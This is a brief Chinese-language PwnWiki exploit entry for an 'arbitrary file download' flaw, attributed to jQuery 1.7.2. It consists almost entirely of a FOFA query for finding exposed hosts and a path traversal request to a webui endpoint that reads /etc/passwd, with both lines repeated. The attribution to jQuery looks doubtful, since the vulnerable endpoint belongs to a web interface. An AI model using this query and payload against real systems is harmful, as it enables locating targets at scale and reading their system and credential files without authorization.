JQuery 1.7.2 任意文件下載漏洞
From PwnWiki
漏洞影響
JQuery 1.7.2
FOFA
body="webui/js/jquerylib/jquery-1.7.2.min.js"
POC
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
JQuery 1.7.2
body="webui/js/jquerylib/jquery-1.7.2.min.js"
/webui/?g=sys_dia_data_down&file_name=../etc/passwd